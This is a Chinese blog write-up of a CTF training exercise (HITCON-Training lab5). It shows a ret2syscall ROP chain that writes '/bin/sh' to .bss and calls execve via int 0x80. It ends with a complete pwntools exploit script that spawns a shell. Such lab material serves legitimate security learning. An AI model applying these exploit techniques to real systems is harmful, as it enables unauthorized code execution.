HITCON-Training-master lab5 wp

最新推荐文章于 2023-09-14 20:43:20 发布
最新推荐文章于 2023-09-14 20:43:20 发布
阅读量389 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zszcr/article/details/79844834
版权
本文介绍如何利用特殊的gadget技巧和syscall调用绕过NX保护机制,实现栈溢出攻击并获取Shell的过程。通过构造特定的payload,将/bin/sh写入内存,并通过execve系统调用执行。
摘要由CSDN通过智能技术生成

程序防护机制:

开启了NX堆栈不可执行

查看了下ida反编译的代码


可以发现主函数十分简单,但是程序里却又十分多的函数,说明这是静态链接编译的

程序要求输入一局话,可以发现在read函数处有明显的栈溢出漏洞,buf大小是20 ,但是read函数读取100个字节的数据

我一开始是想直接用ROPgadget生成ropchain的,但是尝试过发现,它可以溢出的空间不足以放下ROPgadget生成的ropchain

所以失败了

可是文件中没有system函数也没有"/bin/sh"字符串

查看了下文件是否包涵 int 0x80


发现程序中存在中断信号,所以我们可以通过构造syscall的调用来getshell

解题思路

1.将"/bin/sh\x00"写入内存

2.改变execve()函数的参数分别压入 eax,ebx,ecx,edx中,然后执行int 0x80 来执行系统调用

这里将"/bin/sh"写入内存中我又学会了一种新姿势,利用特殊的gadget 例如是 mov dword ptr [ecx],eax

将字符串压入eax中,要写入的地址压入ecx中,然后通过这个gadget就可以将字符串写入想写入的内存了

这些gadget可以通过ROPgadget来找到


第一步:

我在这找到的gadget是mov dword ptr [edx],eax ; pop edx,ret; pop eax,ret


payload = p32(pop_edx) + p32(buf) + p32(pop_eax)+p32("/bin" ) + p32(gadget) + p32(pop_edx) + p32(buf+4)

payload +=p32(pop_eax) + p32("/sh\x00") + p32(gadget)


第二步:

将syscall调用的参数压入相应的寄存器中

execve("/bin/sh\x00",0,0) 对应为 eax=0xb(系统调用号) ebx = buf ;edx=0 ; ecx = 0

payload = p32(pop_edx_ecx_ebx) + p32(0) + p32(0) + p32(buf) + p32(pop_eax) + p32(0xb) + p32(int_80)


exp:

 

from pwn import*
p = process('./simplerop')
elf = ELF('./simplerop')

pop_edx_ecx_ebx = 0x0806eca0
pop_eax = 0x080b7e26
pop_edx = 0x0806ec7a
int_80 = 0x0806c8f5
gadget = 0x080707b9 # mov word ptr [edx],eax
bss = elf.bss()
read_plt = elf.symbols['read']


p.recv()
payload = 'a'*24 + p32(pop_edx) +p32(bss)+ p32(pop_eax) +"/bin"+ p32(gadget)
payload +=  p32(pop_edx) + p32(bss+4) + p32(pop_eax) + "/sh\x00" + p32(gadget)
payload += p32(pop_edx_ecx_ebx) + p32(0) + p32(0) + p32(bss) + p32(pop_eax) + p32(0xb)
payload += p32(int_80)

p.send(payload)
p.interactive()
zs0zrc
关注
专栏目录
CTF|HITCON-Training-master lab5 writeup(ret2syscall题型)
skyattractive的博客
06-12 420
CTF|HITCON-Training-master lab5 writeup 题目的文件名是“simplerop” 意思是对rop链的简单利用 shift+f12 查看后,题目既没有给system函数又没有‘/bin/sh’ 大致判断是CTFwiki上基本rop中的ret2syscall类型的题目 大致思路是, 在文件中需寻找有用的gadget 通过题目中存在的栈溢出 将‘/bin/sh’写入文件中的bss段(或者data段) 然后将执行流引导到bss上执行即可 因为文件是32位,‘/bin/sh’需
HITCON-trainning&寒假做题记录
Peanuts
01-28 684
HITCON-trainning 2019.1.27 是一些好题目这几天准备重新做一遍预计两天之内完成现在做到lab7 题目地址:https://github.com/scwuaptx/HITCON-Training lab1 比较简单的逆向题这里就不贴代码了,就是一个疑惑解码 lab2 一个普通的int0x80的一个shellcode编写这里就不多讲了感觉没有什么 lab3 ret2sc 原理比...
HITCON-Training lab5(自己构造rop)
像初雪一样自由洒落
03-12 384
看到静态链接,一顿欣喜,直接ropchain生成,栈溢出找出来就ok啦?然后后来发现并没有那么简单。。。 ================================================================================================ 【一段小插曲】 做题的时候突然很奇怪,nx开启,堆栈不可执行,为什么可以执行pop这些指令...
HITCON-Training-master lab2 wp
zszcr的博客
04-03 691
查看了下防护机制发现开启了Canary,但是没关系,它没开启堆栈不可执行,说明 这是一道shell code题简单跑了一下程序,发现输出了一句话:give me you shellcodeida反编译查看了下代码代码逻辑也很简单,你输入一段shellcode,然后去执行它我随便去网上找了一段shellcode,输入后发现不行,说明它不是单纯的让我们输入shellcode查看了一下orw_secco...
HITCON-Training lab7(一道简单的格式化字符串读漏洞)
像初雪一样自由洒落
03-27 274
格式化字符串知道他的操作,可是做的一点也不熟练吧,,,BJDCTF上的r2t4不会啊,,,看不懂,,,所以就来补补格式化字符串的题目了,,,, 看到canary开启了,我还以为要泄漏canary呢,结果发现不用那么麻烦,,, 其实看下,思路很清晰,先让你输入东西,然后返回给你,然后你输入password,如果和程序中的一样,你就拿到flag了,, 所以输入的东西里面需要泄漏pa...
HITCON-Training-Writeup:https的简要说明
04-29
cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 ...
CTF|HITCON-Training-master lab4 writeup (ret2libc题型)
skyattractive的博客
06-12 401
CTF|HITCON-Training-master lab4 writeup (ret2libc题型) 做题做题前先看看ctfwiki上对ret2libc的原理描述 原理 ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置(即函数对应的 got表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),故而此时我们需要知道 system 函数的地址。 思路 总体思路就是我们遇到没有system没有"/bin/sh"的文件 我们
CTF|HITCON-Training-master lab3 writeup (ret2shellcode题型)
skyattractive的博客
06-12 320
CTF|HITCON-Training-master lab3 writeup (ret2shellcode题型) ret2shellcode题型 ret2shellcode,即控制程序执行 shellcode代码。 shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。 对于lab3 checksec显示所有保护都没有开启并且有可读可写可执行段(RWX) 显然read函数gets函数存在栈溢出 我们看到bss段中一个叫有name的部分即我们第一个输入的
HITCON Training Lab4 Writeup
博客
06-30 175
首先查看文件的基本属性: 查看整个文件反编译出来的结果: int __cdecl main(int argc, const char **argv, const char **envp) { char **v3; // ST04_4@1 int v4; // ST08_4@1 __int16 v6; // [sp+12h] [bp-10Eh]@1 __int16 v7; // [sp+112h] [bp-Eh]@1 _DWORD *v8; // [sp+11Ch] [bp-
HITCON-training lab10 wp
qq_43409582的博客
01-30 1685
0x00 开始堆利用的学习了,先做第一入门题目,UAF漏洞利用。 0x01 看保护: 一个32位的开了canary和nx保护 0x02 ida分析 一个菜单有加、减、查看功能 看add是什么样子 1-2 .先会malloc一个8字节的空间,指向print_note_content函数,用来打印content。 3-4 .再malloc一个size用来存放你写入的content 再看看del_n...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理.....................................................................................................................................................................................................................
ics的lab5,asm lab
01-12
ics的lab5实现了一个y86assembler。都已通过测试,完全正确。
操作系统ucore实验lab1~lab6答案版
06-08
操作系统实验ucore,lab1~lab6的完整版,已经完成,供需要者参考。下载后可以分析参考,最好不要直接拷贝,这样学不到多少东西。
ICS-LAB5-Y86 Assembler
02-10
CSAPP的lab,不过这个lab没有在官方的网站上找到,大概是不知道从哪里拉来的吧,很简单,也是只上传修改过的部分,可能只有窝的学弟学妹才用得到了0.0
操作系统 ucore lab1
05-02
linux操作系统实验ucore lab1,任务1:1.ucore.img是如何一步一步生成的? 2.一个被系统认为是符合规范的硬盘主引导扇区的特征是什么?
hitcontraining_uaf
m0_62326489的博客
07-11 283
题目的一点自己理解
hitcontraining_bamboobox
像初雪一样自由洒落
04-24 762
hitcontraining_bamboobox这道题有两种解题方式: house of force 参考:house of force unlink house of force(详解) 知识点 只要top chunk size够大,就能随意申请chunk 所以,如果有溢出能控制top chunk size,就可以修改其为-1(0xffffffff最大值),然后malloc(负数)可以向上申请,malloc(正数) 题目流程 程序一开始申请0x10的块,存放hello_message和.
hitcontraining_playfmt
最新发布
qq_62887641的博客
09-14 151
32位保护全关存在格式化字符串漏洞,并且是bss段,也就是非栈上的格式化字符串。
use after free HITCON-training (lab 10 hacknote)
九层台
08-06 889
liu@liu-F117-F:~/1t/u18/文档/堆溢出学习/use after free$ checksec hacknote [*] '/home/liu/1t/u18/\xe6\x96\x87\xe6\xa1\xa3/\xe5\xa0\x86\xe6\xba\xa2\xe5\x87\xba\xe5\xad\xa6\xe4\xb9\xa0/use after free/hacknote' ...
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值